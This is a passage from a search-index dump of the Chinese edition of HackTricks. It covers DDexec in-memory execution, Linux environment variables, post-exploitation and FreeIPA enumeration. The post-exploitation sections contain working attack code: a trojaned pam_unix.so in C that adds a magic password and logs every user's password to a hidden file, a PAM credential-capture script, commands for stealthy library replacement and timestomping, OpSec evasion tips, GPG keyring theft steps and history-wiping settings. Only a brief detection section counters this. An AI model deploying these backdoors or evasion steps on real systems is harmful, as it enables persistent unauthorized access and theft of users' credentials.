黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » 反向 Shell","id":"1963","title":"反向 Shell"},"1964":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » DDexec / EverythingExec » DDexec / EverythingExec","id":"1964","title":"DDexec / EverythingExec"},"1965":{"body":"在Linux中,为了运行一个程序,它必须作为一个文件存在,并且必须通过文件系统层次结构以某种方式可访问(这就是execve()的工作原理)。这个文件可以存储在磁盘上或在内存中(tmpfs, memfd),但你需要一个文件路径。这使得控制在Linux系统上运行的内容变得非常简单,容易检测威胁和攻击者的工具,或者防止他们尝试执行任何他们的内容(例如,不允许无权限用户将可执行文件放置在任何地方)。 但这个技术将改变这一切。如果你无法启动你想要的进程... 那么你就劫持一个已经存在的进程 。 这个技术允许你 绕过常见的保护技术,如只读、noexec、文件名白名单、哈希白名单...","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » DDexec / EverythingExec » 背景","id":"1965","title":"背景"},"1966":{"body":"最终脚本依赖于以下工具才能工作,它们需要在你攻击的系统中可访问(默认情况下,你会在任何地方找到它们): dd\\nbash | zsh | ash (busybox)\\nhead\\ntail\\ncut\\ngrep\\nod\\nreadlink\\nwc\\ntr\\nbase64","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » DDexec / EverythingExec » 依赖","id":"1966","title":"依赖"},"1967":{"body":"如果您能够任意修改进程的内存,那么您就可以接管它。这可以用来劫持一个已经存在的进程并用另一个程序替换它。我们可以通过使用 ptrace() 系统调用(这要求您能够执行系统调用或在系统上有 gdb 可用)来实现这一点,或者更有趣的是,写入 /proc/$pid/mem。 文件 /proc/$pid/mem 是进程整个地址空间的一对一映射( 例如 从 0x0000000000000000 到 0x7ffffffffffff000 在 x86-64 中)。这意味着在偏移量 x 处读取或写入此文件与在虚拟地址 x 处读取或修改内容是相同的。 现在,我们面临四个基本问题: 一般来说,只有 root 和文件的程序所有者可以修改它。 ASLR。 如果我们尝试读取或写入未映射在程序地址空间中的地址,我们将得到 I/O 错误。 这些问题有解决方案,尽管它们并不完美,但还是不错的: 大多数 shell 解释器允许创建文件描述符,这些描述符将被子进程继承。我们可以创建一个指向 shell 的 mem 文件的 fd,并具有写权限……因此使用该 fd 的子进程将能够修改 shell 的内存。 ASLR 甚至不是问题,我们可以检查 shell 的 maps 文件或 procfs 中的任何其他文件,以获取有关进程地址空间的信息。 所以我们需要在文件上 lseek()。从 shell 中,这不能完成,除非使用臭名昭著的 dd。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » DDexec / EverythingExec » 技术","id":"1967","title":"技术"},"1968":{"body":"这些步骤相对简单,不需要任何专业知识来理解: 解析我们想要运行的二进制文件和加载器,以找出它们需要什么映射。然后制作一个“shell”代码,广义上讲,它将执行内核在每次调用 execve() 时所做的相同步骤: 创建上述映射。 将二进制文件读入其中。 设置权限。 最后用程序的参数初始化堆栈,并放置辅助向量(加载器所需)。 跳转到加载器,让它完成其余工作(加载程序所需的库)。 从 syscall 文件中获取进程在执行的系统调用后将返回的地址。 用我们的 shellcode(通过 mem 我们可以修改不可写页面)覆盖该可执行位置。 将我们想要运行的程序传递给进程的 stdin(将被上述“shell”代码 read())。 此时,加载器将负责加载我们程序所需的库并跳转到它。 查看工具在 https://github.com/arget13/DDexec","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » DDexec / EverythingExec » 更详细地","id":"1968","title":"更详细地"},"1969":{"body":"有几种替代 dd 的方法,其中之一 tail 目前是用于通过 mem 文件 lseek() 的默认程序(这就是使用 dd 的唯一目的)。这些替代方案是: bash tail\\nhexdump\\ncmp\\nxxd 设置变量 SEEKER 可以更改使用的 seeker,例如: bash SEEKER=cmp bash ddexec.sh ls -l <<< $(base64 -w0 /bin/ls) 如果您找到另一个在脚本中未实现的有效探测器,您仍然可以通过设置 SEEKER_ARGS 变量来使用它: bash SEEKER=xxd SEEKER_ARGS=\'-s $offset\' zsh ddexec.sh ls -l <<< $(base64 -w0 /bin/ls) 阻止这个,EDRs。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » DDexec / EverythingExec » EverythingExec","id":"1969","title":"EverythingExec"},"197":{"body":"SMB 是一种用于共享文件、打印机和端口的协议。它直接通过 TCP(端口 445)或通过 TCP 上的 NetBIOS(端口 137、138)操作。这种双重兼容性增强了与各种设备的连接。","breadcrumbs":"Pentesting Network » Network Protocols Explained (ESP) » SMB (服务器消息块)","id":"197","title":"SMB (服务器消息块)"},"1970":{"body":"https://github.com/arget13/DDexec tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » DDexec / EverythingExec » 参考","id":"1970","title":"参考"},"1971":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Environment Variables » Linux 环境变量","id":"1971","title":"Linux 环境变量"},"1972":{"body":"全局变量 将会 被 子进程 继承。 您可以通过以下方式为当前会话创建全局变量: bash export MYGLOBAL=\\"hello world\\"\\necho $MYGLOBAL #Prints: hello world 此变量将被当前会话及其子进程访问。 您可以通过以下方式 删除 变量: bash unset MYGLOBAL","breadcrumbs":"Linux Environment Variables » 全局变量","id":"1972","title":"全局变量"},"1973":{"body":"本地变量 只能被 当前的 shell/script 访问。 bash LOCAL=\\"my local\\"\\necho $LOCAL\\nunset LOCAL","breadcrumbs":"Linux Environment Variables » 本地变量","id":"1973","title":"本地变量"},"1974":{"body":"bash set\\nenv\\nprintenv\\ncat /proc/$$/environ\\ncat /proc/`python -c \\"import os; print(os.getppid())\\"`/environ","breadcrumbs":"Linux Environment Variables » 列出当前变量","id":"1974","title":"列出当前变量"},"1975":{"body":"来自: https://geek-university.com/linux/common-environment-variables/ DISPLAY – X 使用的显示器。此变量通常设置为 :0.0 ,表示当前计算机上的第一个显示器。 EDITOR – 用户首选的文本编辑器。 HISTFILESIZE – 历史文件中包含的最大行数。 HISTSIZE – 用户结束会话时添加到历史文件的行数。 HOME – 你的主目录。 HOSTNAME – 计算机的主机名。 LANG – 你当前的语言。 MAIL – 用户邮件存储的位置。通常是 /var/spool/mail/USER 。 MANPATH – 搜索手册页的目录列表。 OSTYPE – 操作系统的类型。 PS1 – bash 中的默认提示符。 PATH – 存储所有目录的路径,这些目录包含你想通过指定文件名而不是相对或绝对路径执行的二进制文件。 PWD – 当前工作目录。 SHELL – 当前命令 shell 的路径(例如, /bin/bash )。 TERM – 当前终端类型(例如, xterm )。 TZ – 你的时区。 USER – 你当前的用户名。","breadcrumbs":"Linux Environment Variables » 常见变量","id":"1975","title":"常见变量"},"1976":{"body":"","breadcrumbs":"Linux Environment Variables » 有趣的黑客变量","id":"1976","title":"有趣的黑客变量"},"1977":{"body":"将 此变量的值更改为 0 ,这样当你 结束会话 时, 历史文件 (~/.bash_history) 将被删除 。 bash export HISTFILESIZE=0","breadcrumbs":"Linux Environment Variables » HISTFILESIZE","id":"1977","title":"HISTFILESIZE"},"1978":{"body":"将 此变量的值更改为 0 ,这样当您 结束会话 时,任何命令都将被添加到 历史文件 (~/.bash_history)中。 bash export HISTSIZE=0","breadcrumbs":"Linux Environment Variables » HISTSIZE","id":"1978","title":"HISTSIZE"},"1979":{"body":"进程将使用此处声明的 proxy 通过 http 或 https 连接到互联网。 bash export http_proxy=\\"http://10.10.10.10:8080\\"\\nexport https_proxy=\\"http://10.10.10.10:8080\\"","breadcrumbs":"Linux Environment Variables » http_proxy & https_proxy","id":"1979","title":"http_proxy & https_proxy"},"198":{"body":"NetBIOS 管理网络会话和连接以共享资源。它支持设备的唯一名称和多个设备的组名称,从而实现有针对性或广播消息。通信可以是无连接的(无确认)或面向连接的(基于会话)。虽然 NetBIOS 传统上通过 IPC/IPX 等协议操作,但它通常在 TCP/IP 上使用。NetBEUI 是一种相关协议,以其速度而闻名,但由于广播也相当冗长。","breadcrumbs":"Pentesting Network » Network Protocols Explained (ESP) » NetBIOS (网络基本输入/输出系统)","id":"198","title":"NetBIOS (网络基本输入/输出系统)"},"1980":{"body":"进程将信任 这些环境变量 中指示的证书。 bash export SSL_CERT_FILE=/path/to/ca-bundle.pem\\nexport SSL_CERT_DIR=/path/to/ca-certificates","breadcrumbs":"Linux Environment Variables » SSL_CERT_FILE & SSL_CERT_DIR","id":"1980","title":"SSL_CERT_FILE & SSL_CERT_DIR"},"1981":{"body":"更改提示的外观。 这是一个示例 Root: 普通用户: 一个、两个和三个后台作业: 一个后台作业,一个已停止,最后一个命令未正确完成: tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Environment Variables » PS1","id":"1981","title":"PS1"},"1982":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Post-Exploitation » Linux Post-Exploitation","id":"1982","title":"Linux Post-Exploitation"},"1983":{"body":"让我们配置一个 PAM 模块来记录每个用户用于登录的密码。如果你不知道什么是 PAM,请查看: PAM - Pluggable Authentication Modules For further details check the original post 。这只是一个摘要: Technique Overview: Pluggable Authentication Modules (PAM) 为在基于 Unix 的系统上管理身份验证提供了灵活性。它们可以通过自定义登录流程来增强安全性,但如果被滥用也会带来风险。本摘要概述了一种使用 PAM 捕获登录凭证的技术,以及相应的缓解策略。 Capturing Credentials: 创建了一个名为 toomanysecrets.sh 的 bash 脚本,用于记录登录尝试,捕获日期、用户名($PAM_USER)、密码(通过 stdin)以及远程主机 IP($PAM_RHOST),并将其写入 /var/log/toomanysecrets.log。 该脚本被赋予可执行权限,并通过在 PAM 配置(common-auth)中使用 pam_exec.so 模块集成,使用了静默运行并将认证令牌暴露给脚本的选项。 该方法演示了被攻陷的 Linux 主机如何被利用以隐蔽地记录凭证。 bash #!/bin/sh\\necho \\" $(date) $PAM_USER, $(cat -), From: $PAM_RHOST\\" >> /var/log/toomanysecrets.log\\nsudo touch /var/log/toomanysecrets.sh\\nsudo chmod 770 /var/log/toomanysecrets.sh\\nsudo nano /etc/pam.d/common-auth\\n# Add: auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh\\nsudo chmod 700 /usr/local/bin/toomanysecrets.sh","breadcrumbs":"Linux Post-Exploitation » Sniffing Logon Passwords with PAM","id":"1983","title":"Sniffing Logon Passwords with PAM"},"1984":{"body":"更多细节请查看 original post 。下面只是一个摘要: Pluggable Authentication Module (PAM) 是 Linux 下用于用户认证的系统。它基于三个主要概念: username , password , 和 service 。每个 service 的配置文件位于 /etc/pam.d/ 目录中,共享库负责处理认证。 目标 :修改 PAM,使其接受一个特定的密码进行认证,从而绕过实际用户密码。这里主要针对 pam_unix.so 共享库,该库由 common-auth 文件调用,而 common-auth 被几乎所有用于密码验证的 services 所包含。","breadcrumbs":"Linux Post-Exploitation » 在 PAM 中植入后门","id":"1984","title":"在 PAM 中植入后门"},"1985":{"body":"定位 Authentication 指令 在 common-auth 文件中: 负责检查用户密码的那一行会调用 pam_unix.so。 修改源代码 : 在 pam_unix_auth.c 源文件中添加一个条件判断:如果使用了预定义的密码则授予访问权限,否则按常规认证流程继续。 重新编译并替换 修改后的 pam_unix.so 库到相应目录。 测试 : 使用预定义密码可以在多种服务(login, ssh, sudo, su, screensaver)上获得访问权限,而正常的认证流程保持不受影响。 tip 你可以使用 https://github.com/zephrax/linux-pam-backdoor 来自动化此过程","breadcrumbs":"Linux Post-Exploitation » 修改 pam_unix.so 的步骤:","id":"1985","title":"修改 pam_unix.so 的步骤:"},"1986":{"body":"如果你发现一个被加密的 .gpg 文件并且找到了用户的 ~/.gnupg 文件夹(pubring, private-keys, trustdb),但由于 GnuPG homedir 的权限/锁定无法解密,可以将 keyring 复制到一个可写的位置并将其作为你的 GPG home 使用。 在没有这样做时你通常会看到的错误有:\\"unsafe ownership on homedir\\", \\"failed to create temporary file\\", 或 \\"decryption failed: No secret key\\"(因为 GPG 无法读/写原始 homedir)。 工作流程: bash # 1) Stage a writable homedir and copy the victim\'s keyring\\nmkdir -p /dev/shm/fakehome/.gnupg\\ncp -r /home/victim/.gnupg/* /dev/shm/fakehome/.gnupg/\\n# 2) Ensure ownership & perms are sane for gnupg\\nchown -R $(id -u):$(id -g) /dev/shm/fakehome/.gnupg\\nchmod 700 /dev/shm/fakehome/.gnupg\\n# 3) Decrypt using the relocated homedir (either flag works)\\nGNUPGHOME=/dev/shm/fakehome/.gnupg gpg -d /home/victim/backup/secrets.gpg\\n# or\\ngpg --homedir /dev/shm/fakehome/.gnupg -d /home/victim/backup/secrets.gpg 如果秘密密钥材料存在于 private-keys-v1.d 中,GPG 将在不提示输入 passphrase 的情况下解锁并解密(或者如果密钥受保护则会提示)。","breadcrumbs":"Linux Post-Exploitation » 通过重定位 homedir 解密 GPG loot","id":"1986","title":"通过重定位 homedir 解密 GPG loot"},"1987":{"body":"0xdf – HTB Environment (GPG homedir relocation to decrypt loot) GnuPG Manual – Home directory and GNUPGHOME tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Post-Exploitation » 参考资料","id":"1987","title":"参考资料"},"1988":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Post-Exploitation » PAM - Pluggable Authentication Modules » PAM - Pluggable Authentication Modules","id":"1988","title":"PAM - Pluggable Authentication Modules"},"1989":{"body":"PAM (Pluggable Authentication Modules) 作为一种安全机制, 验证试图访问计算机服务的用户身份 ,根据各种标准控制他们的访问。它类似于数字门卫,确保只有授权用户可以使用特定服务,同时可能限制他们的使用以防止系统过载。 配置文件 Solaris 和基于 UNIX 的系统 通常使用位于 /etc/pam.conf 的中央配置文件。 Linux 系统 更倾向于目录方法,将特定服务的配置存储在 /etc/pam.d 中。例如,登录服务的配置文件位于 /etc/pam.d/login。 登录服务的 PAM 配置示例如下: auth required /lib/security/pam_securetty.so\\nauth required /lib/security/pam_nologin.so\\nauth sufficient /lib/security/pam_ldap.so\\nauth required /lib/security/pam_unix_auth.so try_first_pass\\naccount sufficient /lib/security/pam_ldap.so\\naccount required /lib/security/pam_unix_acct.so\\npassword required /lib/security/pam_cracklib.so\\npassword required /lib/security/pam_ldap.so\\npassword required /lib/security/pam_pwdb.so use_first_pass\\nsession required /lib/security/pam_unix_session.so PAM 管理领域 这些领域或管理组包括 auth 、 account 、 password 和 session ,每个领域负责身份验证和会话管理过程的不同方面: Auth :验证用户身份,通常通过提示输入密码。 Account :处理账户验证,检查诸如组成员资格或时间限制等条件。 Password :管理密码更新,包括复杂性检查或字典攻击防护。 Session :管理服务会话开始或结束时的操作,例如挂载目录或设置资源限制。 PAM 模块控制 控制决定模块对成功或失败的响应,影响整体身份验证过程。这些包括: Required :所需模块的失败最终导致失败,但仅在检查所有后续模块后。 Requisite :失败时立即终止过程。 Sufficient :成功绕过同一领域的其余检查,除非后续模块失败。 Optional :仅在它是堆栈中唯一模块时导致失败。 示例场景 在具有多个身份验证模块的设置中,过程遵循严格的顺序。如果 pam_securetty 模块发现登录终端未授权,则阻止 root 登录,但由于其“required”状态,所有模块仍会被处理。pam_env 设置环境变量,可能有助于用户体验。pam_ldap 和 pam_unix 模块协同工作以验证用户,pam_unix 尝试使用先前提供的密码,从而提高身份验证方法的效率和灵活性。","breadcrumbs":"Linux Post-Exploitation » PAM - Pluggable Authentication Modules » 基本信息","id":"1989","title":"基本信息"},"199":{"body":"LDAP 是一种协议,允许通过 TCP/IP 管理和访问目录信息。它支持查询和修改目录信息的各种操作。主要用于访问和维护分布式目录信息服务,允许与为 LDAP 通信设计的数据库进行交互。","breadcrumbs":"Pentesting Network » Network Protocols Explained (ESP) » LDAP (轻量级目录访问协议)","id":"199","title":"LDAP (轻量级目录访问协议)"},"1990":{"body":"在高价值的 Linux 环境中,一个经典的持久性技巧是 用木马化的替代品替换合法的 PAM 库 。因为每次 SSH / 控制台登录最终都会调用 pam_unix.so:pam_sm_authenticate(),几行 C 代码就足以捕获凭据或实现 magic 密码绕过。","breadcrumbs":"Linux Post-Exploitation » PAM - Pluggable Authentication Modules » 后门 PAM – 钩住 pam_unix.so","id":"1990","title":"后门 PAM – 钩住 pam_unix.so"},"1991":{"body":"c #define _GNU_SOURCE\\n#include \\n#include \\n#include \\n#include \\n#include static int (*orig)(pam_handle_t *, int, int, const char **);\\nstatic const char *MAGIC = \\"Sup3rS3cret!\\"; int pam_sm_authenticate(pam_handle_t *pamh, int flags, int argc, const char **argv) {\\nconst char *user, *pass;\\npam_get_user(pamh, &user, NULL);\\npam_get_authtok(pamh, PAM_AUTHTOK, &pass, NULL); /* Magic pwd → immediate success */\\nif(pass && strcmp(pass, MAGIC) == 0) return PAM_SUCCESS; /* Credential harvesting */\\nint fd = open(\\"/usr/bin/.dbus.log\\", O_WRONLY|O_APPEND|O_CREAT, 0600);\\ndprintf(fd, \\"%s:%s\\\\n\\", user, pass);\\nclose(fd); /* Fall back to original function */\\nif(!orig) {\\norig = dlsym(RTLD_NEXT, \\"pam_sm_authenticate\\");\\n}\\nreturn orig(pamh, flags, argc, argv);\\n} 编译和隐蔽替换: bash gcc -fPIC -shared -o pam_unix.so trojan_pam.c -ldl -lpam\\nmv /lib/security/pam_unix.so /lib/security/pam_unix.so.bak\\nmv pam_unix.so /lib/security/pam_unix.so\\nchmod 644 /lib/security/pam_unix.so # keep original perms\\ntouch -r /bin/ls /lib/security/pam_unix.so # timestomp","breadcrumbs":"Linux Post-Exploitation » PAM - Pluggable Authentication Modules » 编译备忘单","id":"1991","title":"编译备忘单"},"1992":{"body":"原子覆盖 – 写入临时文件并 mv 到目标位置,以避免半写入的库锁定 SSH。 日志文件放置如 /usr/bin/.dbus.log 与合法桌面工件混合。 保持符号导出相同 (pam_sm_setcred 等),以避免 PAM 错误行为。","breadcrumbs":"Linux Post-Exploitation » PAM - Pluggable Authentication Modules » OpSec Tips","id":"1992","title":"OpSec Tips"},"1993":{"body":"比较 pam_unix.so 的 MD5/SHA256 与发行版包。 检查 /lib/security/ 下的可全局写入或不寻常的所有权。 auditd 规则: -w /lib/security/pam_unix.so -p wa -k pam-backdoor。","breadcrumbs":"Linux Post-Exploitation » PAM - Pluggable Authentication Modules » Detection","id":"1993","title":"Detection"},"1994":{"body":"https://hotpotato.tistory.com/434 Palo Alto Unit42 – Infiltration of Global Telecom Networks tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Post-Exploitation » PAM - Pluggable Authentication Modules » References","id":"1994","title":"References"},"1995":{"body":"Reading time: 11 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"FreeIPA Pentesting » FreeIPA Pentesting","id":"1995","title":"FreeIPA Pentesting"},"1996":{"body":"FreeIPA 是一个开源的 替代方案 ,用于 Microsoft Windows Active Directory ,主要针对 Unix 环境。它结合了完整的 LDAP 目录 和 MIT Kerberos 密钥分发中心,管理方式类似于 Active Directory。利用 Dogtag 证书系统 进行 CA 和 RA 证书管理,支持 多因素 认证,包括智能卡。SSSD 集成用于 Unix 认证过程。","breadcrumbs":"FreeIPA Pentesting » 基本信息","id":"1996","title":"基本信息"},"1997":{"body":"","breadcrumbs":"FreeIPA Pentesting » 指纹","id":"1997","title":"指纹"},"1998":{"body":"文件 /etc/krb5.conf 存储 Kerberos 客户端信息,这是加入域所必需的。这包括 KDC 和管理员服务器的位置、默认设置和映射。 IPA 客户端和服务器的系统范围默认设置在文件 /etc/ipa/default.conf 中设置。 域内的主机必须在 /etc/krb5.keytab 处拥有 krb5.keytab 文件以进行认证过程。 各种环境变量(KRB5CCNAME、KRB5_KTNAME、KRB5_CONFIG、KRB5_KDC_PROFILE、KRB5RCACHETYPE、KRB5RCACHEDIR、KRB5_TRACE、KRB5_CLIENT_KTNAME、KPROP_PORT)用于指向与 Kerberos 认证相关的特定文件和设置。","breadcrumbs":"FreeIPA Pentesting » 文件和环境变量","id":"1998","title":"文件和环境变量"},"1999":{"body":"工具如 ipa、kdestroy、kinit、klist、kpasswd、ksu、kswitch 和 kvno 是管理 FreeIPA 域、处理 Kerberos 票证、修改密码和获取服务票证等功能的关键。","breadcrumbs":"FreeIPA Pentesting » 二进制文件","id":"1999","title":"二进制文件"},"2":{"body":"","breadcrumbs":"HackTricks » 企业赞助商","id":"2","title":"企业赞助商"},"20":{"body":"Copyright © 保留所有权利,除非另有说明。 License Summary: Attribution: 你可以自由地: Share — 以任何媒介或格式复制和重新分发材料。 Adapt — 混合、转变并基于材料进行创作。 Additional Terms: Third-Party Content: 本博客/书籍的某些部分可能包含来自其他来源的内容,例如其他博客或出版物的摘录。使用此类内容是基于合理使用原则或获得相关版权持有者的明确许可。请参阅原始来源以获取有关第三方内容的具体许可信息。 Authorship: HackTricks创作的原始内容受此许可条款的约束。鼓励在分享或改编时将此作品归功于作者。 Exemptions: Commercial Use: 有关此内容商业使用的查询,请与我联系。 此许可不授予与内容相关的任何商标或品牌权利。所有在本博客/书籍中出现的商标和品牌均为其各自所有者的财产。 通过访问或使用HackTricks,你同意遵守此许可的条款。如果你不同意这些条款,请不要访问此网站。","breadcrumbs":"HackTricks Values & FAQ » LICENSE","id":"20","title":"LICENSE"},"200":{"body":"Active Directory 是一个可通过网络访问的数据库,包含用户、组、权限和资源等对象,促进网络实体的集中管理。AD 将其数据组织成域的层次结构,可以包含服务器、组和用户。子域允许进一步细分,每个子域可能维护自己的服务器和用户基础。该结构集中管理用户,授予或限制对网络资源的访问。可以进行查询以检索特定信息,如联系信息,或在域内查找资源,如打印机。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » Network Protocols Explained (ESP) » Active Directory (AD)","id":"200","title":"Active Directory (AD)"},"2000":{"body":"提供了一幅插图,描绘了典型的 FreeIPA 服务器设置。","breadcrumbs":"FreeIPA Pentesting » 网络","id":"2000","title":"网络"},"2001":{"body":"FreeIPA 中的认证利用 Kerberos ,与 Active Directory 中的认证相似。访问域资源需要有效的 Kerberos 票证,具体存储位置取决于 FreeIPA 域配置。","breadcrumbs":"FreeIPA Pentesting » 认证","id":"2001","title":"认证"},"2002":{"body":"CCACHE 文件通常存储在 /tmp 中,权限为 600 ,是用于存储 Kerberos 凭据的二进制格式,重要的是可以在没有用户明文密码的情况下进行认证。可以使用 klist 命令解析 CCACHE 票证,重新使用有效的 CCACHE 票证涉及将 KRB5CCNAME 导出到票证文件的路径。","breadcrumbs":"FreeIPA Pentesting » CCACHE 票证文件","id":"2002","title":"CCACHE 票证文件"},"2003":{"body":"另外,CCACHE 票证可以存储在 Linux 密钥环中,提供对票证管理的更多控制。票证存储的范围各异(KEYRING:name、KEYRING:process:name、KEYRING:thread:name、KEYRING:session:name、KEYRING:persistent:uidnumber),klist 能够为用户解析这些信息。然而,从 Unix 密钥环重新使用 CCACHE 票证可能会面临挑战,像 Tickey 这样的工具可用于提取 Kerberos 票证。","breadcrumbs":"FreeIPA Pentesting » Unix 密钥环","id":"2003","title":"Unix 密钥环"},"2004":{"body":"密钥表文件包含 Kerberos 主体和加密密钥,对于在不需要主体密码的情况下获取有效的票证授予票(TGT)至关重要。可以使用 klist 等实用程序和 KeytabParser 等脚本轻松解析和重新使用密钥表文件中的凭据。","breadcrumbs":"FreeIPA Pentesting » 密钥表","id":"2004","title":"密钥表"},"2005":{"body":"您可以在以下链接中找到有关如何在 Linux 中使用票证的更多信息: Linux Active Directory","breadcrumbs":"FreeIPA Pentesting » 备忘单","id":"2005","title":"备忘单"},"2006":{"body":"warning 您可以通过 ldap 和其他 二进制 工具进行 枚举 ,或 连接到 FreeIPA 服务器的 443 端口的网页 。","breadcrumbs":"FreeIPA Pentesting » 枚举","id":"2006","title":"枚举"},"2007":{"body":"可以创建 主机 、 用户 和 组 。主机和用户被分类到称为“ 主机组 ”和“ 用户组 ”的容器中。这些类似于 组织单位 (OU)。 在 FreeIPA 中,LDAP 服务器默认允许 匿名绑定 ,大量数据可以 未经身份验证 进行枚举。这可以枚举所有可用的未经身份验证的数据: ldapsearch -x 要获取 更多信息 ,您需要使用 经过身份验证 的会话(请查看身份验证部分以了解如何准备经过身份验证的会话)。 bash # Get all users of domain\\nldapsearch -Y gssapi -b \\"cn=users,cn=compat,dc=domain_name,dc=local\\" # Get users groups\\nldapsearch -Y gssapi -b \\"cn=groups,cn=accounts,dc=domain_name,dc=local\\" # Get all the hosts\\nldapsearch -Y gssapi -b \\"cn=computers,cn=accounts,dc=domain_name,dc=local\\" # Get hosts groups\\nldapsearch -Y gssapi -b \\"cn=hostgroups,cn=accounts,dc=domain_name,dc=local\\" 从域加入的机器上,您将能够使用 已安装的二进制文件 来枚举域: bash ipa user-find\\nipa usergroup-find\\nipa host-find\\nipa host-group-find ------------------- ipa user-show --all\\nipa usergroup-show --all\\nipa host-find --all\\nipa hostgroup-show --all tip FreeIPA 的 admin 用户相当于 AD 中的 domain admins 